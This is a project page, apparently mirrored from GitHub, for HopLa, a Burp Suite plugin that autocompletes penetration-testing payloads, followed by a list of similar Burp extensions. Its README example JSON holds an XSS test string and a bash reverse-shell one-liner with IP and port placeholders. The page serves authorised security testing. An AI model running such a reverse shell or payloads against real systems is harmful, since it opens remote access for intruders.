GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → synacktiv → HopLa

synacktiv / HopLa

Licence: BSD-3-Clause License
HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite

Programming Languages

java
68154 projects - #9 most used programming language
HTML
75241 projects

Labels

burpburp-pluginburp-extensionsburp-uiburp-suite

Projects that are alternatives of or similar to HopLa

burp-token-rewrite
Burp extension for automated handling of CSRF tokens
Stars: ✭ 15 (-96.64%)
Mutual labels:  burp, burp-plugin, burp-extensions
TurboDataMiner
The objective of this Burp Suite extension is the flexible and dynamic extraction, correlation, and structured presentation of information from the Burp Suite project as well as the flexible and dynamic on-the-fly modification of outgoing or incoming HTTP requests using Python scripts. Thus, Turbo Data Miner shall aid in gaining a better and fas…
Stars: ✭ 46 (-89.69%)
Mutual labels:  burp, burp-plugin, burp-extensions
burp-suite-utils
Utilities for creating Burp Suite Extensions.
Stars: ✭ 19 (-95.74%)
Mutual labels:  burp, burp-plugin, burp-extensions
burp-aem-scanner
Burp Scanner extension to fingerprint and actively scan instances of the Adobe Experience Manager CMS. It checks the website for common misconfigurations and security holes.
Stars: ✭ 60 (-86.55%)
Mutual labels:  burp, burp-plugin, burp-extensions
burp-api-common
common methods that used by my burp extension projects
Stars: ✭ 29 (-93.5%)
Mutual labels:  burp, burp-plugin, burp-extensions
burp-flow
Extension providing view with filtering capabilities for both complete and incomplete requests from all burp tools.
Stars: ✭ 45 (-89.91%)
Mutual labels:  burp, burp-plugin, burp-extensions
burp-wildcard
Burp extension intended to compact Burp extension tabs by hijacking them to own tab.
Stars: ✭ 119 (-73.32%)
Mutual labels:  burp, burp-plugin, burp-extensions
flarequench
Burp Suite plugin that adds additional checks to the passive scanner to reveal the origin IP(s) of Cloudflare-protected web applications.
Stars: ✭ 44 (-90.13%)
Mutual labels:  burp-plugin, burp-extensions
Swurg
Parse OpenAPI documents into Burp Suite for automating OpenAPI-based APIs security assessments (approved by PortSwigger for inclusion in their official BApp Store).
Stars: ✭ 94 (-78.92%)
Mutual labels:  burp-plugin, burp-extensions
burp-piper
Piper Burp Suite Extender plugin
Stars: ✭ 85 (-80.94%)
Mutual labels:  burp-plugin, burp-extensions
Headless Burp
Automate security tests using Burp Suite.
Stars: ✭ 192 (-56.95%)
Mutual labels:  burp-plugin, burp-extensions
U2c
Unicode To Chinese -- U2C : A burpsuite Extender That Convert Unicode To Chinese 【Unicode编码转中文的burp插件】
Stars: ✭ 83 (-81.39%)
Mutual labels:  burp-plugin, burp-extensions
Burp Molly Pack
Security checks pack for Burp Suite
Stars: ✭ 123 (-72.42%)
Mutual labels:  burp-plugin, burp-extensions
CTFHelper
A simple Burp extension for scanning stuffs in CTF
Stars: ✭ 29 (-93.5%)
Mutual labels:  burp, burp-extensions
Cstc
CSTC is a Burp Suite extension that allows request/response modification using a GUI analogous to CyberChef
Stars: ✭ 91 (-79.6%)
Mutual labels:  burp-plugin, burp-extensions
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (-63.68%)
Mutual labels:  burp-plugin, burp-extensions
Burpsuite Collections
BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程,欢迎添砖加瓦---burpsuite-pro burpsuite-extender burpsuite cracked-version hackbar hacktools fuzzing fuzz-testing burp-plugin burp-extensions bapp-store brute-force-attacks brute-force-passwords waf sqlmap jar
Stars: ✭ 1,081 (+142.38%)
Mutual labels:  burp-plugin, burp-extensions
Mssqli Duet
SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing
Stars: ✭ 82 (-81.61%)
Mutual labels:  burp-plugin, burp-extensions
SQLi-Query-Tampering
SQLi Query Tampering extends and adds custom Payload Generator/Processor in Burp Suite's Intruder. This extension gives you the flexibility of manual testing with many powerful evasion techniques.
Stars: ✭ 123 (-72.42%)
Mutual labels:  burp-plugin, burp-extensions
auth analyzer
Burp Extension for testing authorization issues. Automated request repeating and parameter value extraction on the fly.
Stars: ✭ 77 (-82.74%)
Mutual labels:  burp-plugin, burp-extensions
View All Similar Projects ➔

HopLa

💥 All the power of PayloadsAllTheThings, without the overhead. This extension adds autocompletion support and useful payloads in Burp Suite to make your intrusion easier.

Feel free to improve with your payloads ! ❤️

Developed by Alexis Danizan Twitter Follow
Released as open source by Synacktiv 🥷

Demo GIF

Getting started

Installation

  • Download the jar file from the release directory
  • Add it to Burp Suite using the Extender tab

Build

Execute gradle build and you'll have the plugin ready in releases/HopLa.jar.

Usage

By default HopLa is shipped with default payloads. You can add yours by loading a custom JSON file in the the menu.

At the first usage HopLa creates a JSON file containing all the payloads in the jar file directory.

Press Ctrl+Q to display the payload library menu.

You can disable the global autocompletion in the top menu.

For i3, add the following line to $HOME/.config/i3/config for floating frame:

for_window [class=".*burp-StartBurp.*" title="^ $"] floating enable

How to add payloads

The JSON payloads file follow the structure:

{
    "categories": [
        {
            "name": "XSS",
            "values": [
                {
                    "name": "Simple",
                    "value": "<script>alert(1)</script>"
                },
                {
                    "name": "Multiline",
                    "value": "AAAA\nBBBB"
                },
                {
                    "name" : "Nested XSS menu",
                    "values": [
                        {
                            "name": "Simple 2",
                            "value": "<script>alert(1)</script>"
                        }
                    ]
                }
            ]
        }
    ],
    "keywords": [
        {
            "name": "Headers",
            "values": [
                "X-Forwarded-For",
                "X-Originally-Forwarded-For",
                "X-Originating-Ip",
                "X-Originating-IP"
            ]
        }
    ]
}

There is no nesting limit.

You can automatically add a prompt dialog:

{
    "name":  "Bash UDP",
    "value":  "sh -i >& /dev/udp/§IP§/§PORT§ 0>&1",
    "prompt": ["IP","PORT"]
},

To add only keywords that do not appear in the menu, you can add them in the keywords category:

{
    "keywords": [
        {
            "name": "Headers",
            "values": [
                "X-Forwarded-For",
                "X-Originally-Forwarded-For",
                "X-Originating-Ip",
                "X-Originating-IP"
            ]
        }
    ]
}

Roadmap

  • Support custom key binding for payload menu

Thanks To

Thanks a lot for your awesome work !

License

Released under BSD 3-Clause License see LICENSE for more information

Please feel free to report bugs, suggest features, or send pull requests.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].